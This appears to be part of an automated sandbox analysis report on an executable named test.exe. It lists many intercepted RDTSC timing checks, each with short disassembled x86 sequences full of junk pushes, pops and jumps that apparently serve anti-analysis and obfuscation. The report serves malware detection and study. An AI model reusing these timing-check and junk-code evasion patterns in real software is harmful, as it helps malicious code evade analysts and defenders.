              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC8F1F second address: EC8F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC8F24 second address: EC8FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403D12A5BDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov di, 61F2h 0x00000011 adc edi, 4EEF6BB1h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov ebx, dword ptr [ebp+122D368Ah] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F403D12A5B8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov eax, dword ptr [ebp+122D11ADh] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007F403D12A5B8h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 0000001Dh 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 mov ebx, dword ptr [ebp+122D33A3h] 0x0000006b push FFFFFFFFh 0x0000006d sbb bl, FFFFFF81h 0x00000070 nop 0x00000071 pushad 0x00000072 jne 00007F403D12A5BCh 0x00000078 push eax 0x00000079 push edx 0x0000007a jng 00007F403D12A5B6h 0x00000080 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC8FC8 second address: EC8FDD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F403C75C8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F403C75C8F6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EC8FDD second address: EC8FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED2938 second address: ED2943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F403C75C8F6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E64C72 second address: E64C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F403D12A5C5h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED224E second address: ED2252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED2252 second address: ED226E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F403D12A5B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F403D12A5BCh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED226E second address: ED2274 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED23DB second address: ED23EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F403D12A5B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED23EC second address: ED23F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED23F2 second address: ED23F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED2573 second address: ED257E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F403C75C8F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED5A1F second address: ED5A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED5A23 second address: ED5A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: ED5A27 second address: ED5A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EDCB27 second address: EDCB76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F403C75C907h 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 js 00007F403C75C8F6h 0x00000016 jmp 00007F403C75C903h 0x0000001b jmp 00007F403C75C900h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EDD083 second address: EDD08A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EDD32C second address: EDD33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F403C75C8F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EDD33A second address: EDD33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EDD616 second address: EDD61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EDD61C second address: EDD622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE10FB second address: EE1102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE1102 second address: EE112A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F403D12A5B8h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F403D12A5C4h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB5B6E second address: EB5B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB5EBC second address: EB5EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB5EC2 second address: EB5EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F403C75C8FCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F403C75C8F8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB618B second address: EB6195 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB6378 second address: EB6392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F403C75C902h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB6392 second address: EB6396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB68A4 second address: EB68AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB68AB second address: EB68E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub dword ptr [ebp+124773ADh], ebx 0x00000013 push 0000001Eh 0x00000015 jmp 00007F403D12A5C9h 0x0000001a mov dword ptr [ebp+122D368Ah], eax 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edi 0x00000025 pop edi 0x00000026 pop eax 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB6A2B second address: EB6A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB6A31 second address: EB6A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB6BBD second address: EB6BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB6BDA second address: EB6C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F403D12A5B6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE1405 second address: EE140B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE140B second address: EE142C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F403D12A5C9h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE142C second address: EE1432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE1432 second address: EE1438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE16FB second address: EE1701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE1DFC second address: EE1E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F403D12A5B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE1E06 second address: EE1E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE1E0A second address: EE1E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F403D12A5BEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE6D07 second address: EE6D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F403C75C8F6h 0x0000000f je 00007F403C75C8F6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE6D1C second address: EE6D6F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F403D12A5BEh 0x00000010 jmp 00007F403D12A5BEh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jns 00007F403D12A5B8h 0x0000001e popad 0x0000001f push edx 0x00000020 jmp 00007F403D12A5BFh 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F403D12A5BEh 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EE6D6F second address: EE6D86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C903h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEE15D second address: EEE164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEE164 second address: EEE184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C8FEh 0x00000009 jnp 00007F403C75C8F6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEE184 second address: EEE1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F403D12A5C5h 0x0000000c jmp 00007F403D12A5BBh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEE1B1 second address: EEE1BB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F403C75C8F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEE753 second address: EEE758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEE8EF second address: EEE90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C907h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEE90A second address: EEE914 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F403D12A5B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEEA44 second address: EEEA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEEBC9 second address: EEEBD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F403D12A5B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEED30 second address: EEED3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F403C75C8F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEF1AD second address: EEF1BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EEDA1B second address: EEDA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF5898 second address: EF589C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF589C second address: EF58A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF469A second address: EF46B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403D12A5C0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF483B second address: EF4841 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF4841 second address: EF4847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF4847 second address: EF484D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF49A5 second address: EF49B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007F403D12A5D3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF4C8A second address: EF4CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C902h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF4CA4 second address: EF4CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF4CAD second address: EF4CB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF5214 second address: EF5218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E6306D second address: E63099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F403C75C8F6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F403C75C900h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F403C75C8FBh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E63099 second address: E630F0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F403D12A5C2h 0x00000012 push edx 0x00000013 pop edx 0x00000014 js 00007F403D12A5B6h 0x0000001a popad 0x0000001b jmp 00007F403D12A5BDh 0x00000020 jmp 00007F403D12A5BCh 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F403D12A5C2h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E630F0 second address: E630F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E630F4 second address: E630F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF9CE2 second address: EF9CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF9CE8 second address: EF9CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF9CFC second address: EF9D17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C906h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF9D17 second address: EF9D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403D12A5BCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF9969 second address: EF996F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF996F second address: EF9975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF9975 second address: EF9986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F403C75C8FCh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EF9986 second address: EF99A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403D12A5C9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFCC0C second address: EFCC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C902h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F403C75C906h 0x00000017 jmp 00007F403C75C8FDh 0x0000001c popad 0x0000001d jmp 00007F403C75C902h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFCC61 second address: EFCC67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFCC67 second address: EFCC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFCC6B second address: EFCC75 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F403D12A5B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFCC75 second address: EFCC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFC4ED second address: EFC4F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFC4F3 second address: EFC50E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F403C75C8F6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 je 00007F403C75C8F6h 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFC50E second address: EFC514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFC514 second address: EFC529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C900h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFC529 second address: EFC535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007F403D12A5B6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EFC6C2 second address: EFC6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E5FB5B second address: E5FB60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F04E43 second address: F04E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F04E47 second address: F04E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F403D12A5C0h 0x0000000d je 00007F403D12A5BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F04E67 second address: F04E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F403C75C902h 0x0000000b jp 00007F403C75C8FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
